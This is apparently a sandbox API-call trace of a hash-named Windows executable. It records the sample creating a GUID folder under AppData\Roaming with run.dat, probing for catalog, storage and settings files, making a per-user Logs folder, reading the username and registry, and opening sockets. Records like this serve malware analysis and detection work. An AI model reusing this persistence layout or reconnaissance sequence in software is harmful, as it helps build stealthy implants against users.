[0202.783] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778", nBufferLength=0x105, lpBuffer=0x19e598, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778", lpFilePart=0x0) returned 0x4a
[0202.783] GetLastError () returned 0x3f0
[0202.784] SetErrorMode (uMode=0x1) returned 0x0
[0202.785] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778"), fInfoLevelId=0x0, lpFileInformation=0x19e9b4 | out: lpFileInformation=0x19e9b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0202.785] GetLastError () returned 0x2
[0202.785] SetErrorMode (uMode=0x0) returned 0x1
[0202.785] SetErrorMode (uMode=0x1) returned 0x0
[0202.786] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming"), fInfoLevelId=0x0, lpFileInformation=0x19e9b4 | out: lpFileInformation=0x19e9b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x1b68123c, ftLastAccessTime.dwHighDateTime=0x1d7b45e, ftLastWriteTime.dwLowDateTime=0x1b68123c, ftLastWriteTime.dwHighDateTime=0x1d7b45e, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0202.786] GetLastError () returned 0x2
[0202.786] SetErrorMode (uMode=0x0) returned 0x1
[0202.786] SetErrorMode (uMode=0x1) returned 0x0
[0202.786] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), fInfoLevelId=0x0, lpFileInformation=0x19e9b4 | out: lpFileInformation=0x19e9b4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
[0202.786] GetLastError () returned 0x2
[0202.787] SetErrorMode (uMode=0x0) returned 0x1
[0202.787] SetErrorMode (uMode=0x1) returned 0x0
[0202.787] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX" (normalized: "c:\\users\\rdhj0cnfevzx"), fInfoLevelId=0x0, lpFileInformation=0x19e9b4 | out: lpFileInformation=0x19e9b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0202.787] GetLastError () returned 0x2
[0202.787] SetErrorMode (uMode=0x0) returned 0x1
[0202.787] SetErrorMode (uMode=0x1) returned 0x0
[0202.787] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x19e9b4 | out: lpFileInformation=0x19e9b4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0202.787] GetLastError () returned 0x2
[0202.787] SetErrorMode (uMode=0x0) returned 0x1
[0202.788] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778"), lpSecurityAttributes=0x0) returned 1
[0202.791] GetLastError () returned 0x2
[0202.806] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\run.dat", nBufferLength=0x105, lpBuffer=0x19e58c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\run.dat", lpFilePart=0x0) returned 0x52
[0202.806] GetLastError () returned 0x2
[0202.806] SetErrorMode (uMode=0x1) returned 0x0
[0202.807] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\run.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\run.dat"), fInfoLevelId=0x0, lpFileInformation=0x19ea0c | out: lpFileInformation=0x19ea0c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0202.807] GetLastError () returned 0x2
[0202.807] SetErrorMode (uMode=0x0) returned 0x1
[0202.808] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\run.dat", nBufferLength=0x105, lpBuffer=0x19e474, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\run.dat", lpFilePart=0x0) returned 0x52
[0202.808] GetLastError () returned 0x2
[0202.808] SetErrorMode (uMode=0x1) returned 0x0
[0202.809] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\run.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\run.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0
[0202.810] GetLastError () returned 0x0
[0202.810] GetFileType (hFile=0x2e0) returned 0x1
[0202.811] SetErrorMode (uMode=0x0) returned 0x1
[0202.811] GetFileType (hFile=0x2e0) returned 0x1
[0202.812] WriteFile (in: hFile=0x2e0, lpBuffer=0x24ac278*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x19e99c, lpOverlapped=0x0 | out: lpBuffer=0x24ac278*, lpNumberOfBytesWritten=0x19e99c*=0x8, lpOverlapped=0x0) returned 1
[0202.815] GetLastError () returned 0x0
[0202.815] CloseHandle (hObject=0x2e0) returned 1
[0202.817] GetLastError () returned 0x0
[0202.844] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x673930 | out: pszPath="C:\\Program Files (x86)") returned 0x0
[0202.846] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x105, lpBuffer=0x19e580, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16
[0202.846] GetLastError () returned 0x3f0
[0202.849] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Exceptions\\1.2.2.0", nBufferLength=0x105, lpBuffer=0x19e5c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Exceptions\\1.2.2.0", lpFilePart=0x0) returned 0x5d
[0202.849] GetLastError () returned 0x3f0
[0202.849] SetErrorMode (uMode=0x1) returned 0x0
[0202.849] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Exceptions\\1.2.2.0" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\exceptions\\1.2.2.0"), fInfoLevelId=0x0, lpFileInformation=0x19ea48 | out: lpFileInformation=0x19ea48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0202.849] GetLastError () returned 0x3
[0202.849] SetErrorMode (uMode=0x0) returned 0x1
[0202.875] strncat_s (in: _Destination="System.Collections.Generic", _SizeInBytes=0x29, _Source=".", _MaxCount=0xffffffff | out: _Destination="System.Collections.Generic.") returned 0x0
[0202.936] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\catalog.dat", nBufferLength=0x105, lpBuffer=0x19e448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\catalog.dat", lpFilePart=0x0) returned 0x56
[0202.936] GetLastError () returned 0x3
[0202.936] SetErrorMode (uMode=0x1) returned 0x0
[0202.936] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\catalog.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\catalog.dat"), fInfoLevelId=0x0, lpFileInformation=0x19e8c8 | out: lpFileInformation=0x19e8c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0202.937] GetLastError () returned 0x2
[0202.937] SetErrorMode (uMode=0x0) returned 0x1
[0202.951] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\storage.dat", nBufferLength=0x105, lpBuffer=0x19e450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\storage.dat", lpFilePart=0x0) returned 0x56
[0202.953] GetLastError () returned 0x2
[0202.953] SetErrorMode (uMode=0x1) returned 0x0
[0202.953] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\storage.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\storage.dat"), fInfoLevelId=0x0, lpFileInformation=0x19e8d0 | out: lpFileInformation=0x19e8d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0202.953] GetLastError () returned 0x2
[0202.953] SetErrorMode (uMode=0x0) returned 0x1
[0203.332] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin", nBufferLength=0x105, lpBuffer=0x19e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin", lpFilePart=0x0) returned 0x57
[0203.333] GetLastError () returned 0x2
[0203.333] SetErrorMode (uMode=0x1) returned 0x0
[0203.333] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bin" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\settings.bin"), fInfoLevelId=0x0, lpFileInformation=0x19e9f0 | out: lpFileInformation=0x19e9f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0203.333] GetLastError () returned 0x2
[0203.333] SetErrorMode (uMode=0x0) returned 0x1
[0203.818] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bak", nBufferLength=0x105, lpBuffer=0x19e488, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bak", lpFilePart=0x0) returned 0x57
[0203.819] GetLastError () returned 0x0
[0203.819] SetErrorMode (uMode=0x1) returned 0x0
[0203.819] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\settings.bak" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\settings.bak"), fInfoLevelId=0x0, lpFileInformation=0x19e908 | out: lpFileInformation=0x19e908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0203.819] GetLastError () returned 0x2
[0203.819] SetErrorMode (uMode=0x0) returned 0x1
[0204.062] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19dc64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0204.062] GetLastError () returned 0x0
[0204.087] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0204.087] GetLastError () returned 0x0
[0204.108] GetUserNameW (in: lpBuffer=0x673930, pcbBuffer=0x19e25c | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19e25c) returned 1
[0204.274] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Logs\\RDhJ0CNFevzX", nBufferLength=0x105, lpBuffer=0x19dd9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Logs\\RDhJ0CNFevzX", lpFilePart=0x0) returned 0x5c
[0204.274] GetLastError () returned 0x0
[0204.274] SetErrorMode (uMode=0x1) returned 0x0
[0204.274] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Logs\\RDhJ0CNFevzX" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\logs\\rdhj0cnfevzx"), fInfoLevelId=0x0, lpFileInformation=0x19e1b8 | out: lpFileInformation=0x19e1b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0204.274] GetLastError () returned 0x3
[0204.274] SetErrorMode (uMode=0x0) returned 0x1
[0204.275] SetErrorMode (uMode=0x1) returned 0x0
[0204.275] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Logs" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\logs"), fInfoLevelId=0x0, lpFileInformation=0x19e1b8 | out: lpFileInformation=0x19e1b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0204.275] GetLastError () returned 0x2
[0204.275] SetErrorMode (uMode=0x0) returned 0x1
[0204.275] SetErrorMode (uMode=0x1) returned 0x0
[0204.275] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778"), fInfoLevelId=0x0, lpFileInformation=0x19e1b8 | out: lpFileInformation=0x19e1b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d98709c, ftCreationTime.dwHighDateTime=0x1d7b45e, ftLastAccessTime.dwLowDateTime=0x2d9b6ade, ftLastAccessTime.dwHighDateTime=0x1d7b45e, ftLastWriteTime.dwLowDateTime=0x2d9b6ade, ftLastWriteTime.dwHighDateTime=0x1d7b45e, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
[0204.275] GetLastError () returned 0x2
[0204.275] SetErrorMode (uMode=0x0) returned 0x1
[0204.275] SetErrorMode (uMode=0x1) returned 0x0
[0204.275] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming"), fInfoLevelId=0x0, lpFileInformation=0x19e1b8 | out: lpFileInformation=0x19e1b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x2d98709c, ftLastAccessTime.dwHighDateTime=0x1d7b45e, ftLastWriteTime.dwLowDateTime=0x2d98709c, ftLastWriteTime.dwHighDateTime=0x1d7b45e, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0204.275] GetLastError () returned 0x2
[0204.275] SetErrorMode (uMode=0x0) returned 0x1
[0204.275] SetErrorMode (uMode=0x1) returned 0x0
[0204.275] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), fInfoLevelId=0x0, lpFileInformation=0x19e1b8 | out: lpFileInformation=0x19e1b8*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1
[0204.275] GetLastError () returned 0x2
[0204.275] SetErrorMode (uMode=0x0) returned 0x1
[0204.276] SetErrorMode (uMode=0x1) returned 0x0
[0204.276] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX" (normalized: "c:\\users\\rdhj0cnfevzx"), fInfoLevelId=0x0, lpFileInformation=0x19e1b8 | out: lpFileInformation=0x19e1b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0204.276] GetLastError () returned 0x2
[0204.276] SetErrorMode (uMode=0x0) returned 0x1
[0204.276] SetErrorMode (uMode=0x1) returned 0x0
[0204.276] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x19e1b8 | out: lpFileInformation=0x19e1b8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0204.276] GetLastError () returned 0x2
[0204.276] SetErrorMode (uMode=0x0) returned 0x1
[0204.276] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Logs" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\logs"), lpSecurityAttributes=0x0) returned 1
[0204.277] GetLastError () returned 0x2
[0204.277] CreateDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\03845CB8-7441-4A2F-8C0F-C90408AF5778\\Logs\\RDhJ0CNFevzX" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\03845cb8-7441-4a2f-8c0f-c90408af5778\\logs\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 1
[0204.277] GetLastError () returned 0x2
[0204.619] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19ab7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0204.619] GetLastError () returned 0x3
[0204.619] SetErrorMode (uMode=0x1) returned 0x0
[0204.619] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config"), fInfoLevelId=0x0, lpFileInformation=0x19b024 | out: lpFileInformation=0x19b024*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0204.619] GetLastError () returned 0x2
[0204.619] SetErrorMode (uMode=0x0) returned 0x1
[0204.797] GetWindowThreadProcessId (in: hWnd=0x4024a, lpdwProcessId=0x19e21c | out: lpdwProcessId=0x19e21c) returned 0xce0
[0204.797] GetCurrentThreadId () returned 0xce0
[0204.837] CoCreateGuid (in: pguid=0x19ea7c | out: pguid=0x19ea7c*(Data1=0xba084fd6, Data2=0x923d, Data3=0x4b95, Data4=([0]=0x84, [1]=0x7a, [2]=0xe4, [3]=0xc8, [4]=0xef, [5]=0xdd, [6]=0xc9, [7]=0x53))) returned 0x0
[0204.855] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x673930 | out: lpWSAData=0x673930) returned 0
[0204.863] GetLastError () returned 0x0
[0204.871] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x19e1c4 | out: phkResult=0x19e1c4*=0x3e8) returned 0x0
[0204.871] RegQueryValueExW (in: hKey=0x3e8, lpValueName="InstallationType", lpReserved=0x0, lpType=0x19e20c, lpData=0x0, lpcbData=0x19e208*=0x0 | out: lpType=0x19e20c*=0x1, lpData=0x0, lpcbData=0x19e208*=0xe) returned 0x0
[0204.873] RegQueryValueExW (in: hKey=0x3e8, lpValueName="InstallationType", lpReserved=0x0, lpType=0x19e20c, lpData=0x673930, lpcbData=0x19e208*=0xe | out: lpType=0x19e20c*=0x1, lpData="Client", lpcbData=0x19e208*=0xe) returned 0x0
[0204.873] RegCloseKey (hKey=0x3e8) returned 0x0
[0204.880] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3ec
[0205.181] GetLastError () returned 0x0
[0205.181] setsockopt (s=0x3ec, level=65535, optname=128, optval="\x01", optlen=4) returned -1
[0205.181] GetLastError () returned 0x273a
[0205.181] closesocket (s=0x3ec) returned 0
[0205.182] GetLastError () returned 0x0
[0205.182] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x3ec
[0205.184] GetLastError () returned 0x0
[0205.184] setsockopt (s=0x3ec, level=65535, optname=128, optval="\x01", optlen=4) returned -1
[0205.184] GetLastError () returned 0x273a
[0205.184] closesocket (s=0x3ec) returned 0
[0205.184] GetLastError () returned 0x0
[0205.424] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19e424, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0205.424] GetLastError () returned 0x0
[0205.424] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19e3d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0205.424] GetLastError () returned 0x0
[0205.425] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19e3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0205.425] GetLastError () returned 0x0
[0205.766] GetCurrentProcess () returned 0xffffffff
[0205.766] GetLastError () returned 0x3f0
[0205.767] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19e4ec | out: TokenHandle=0x19e4ec*=0x3fc) returned 1
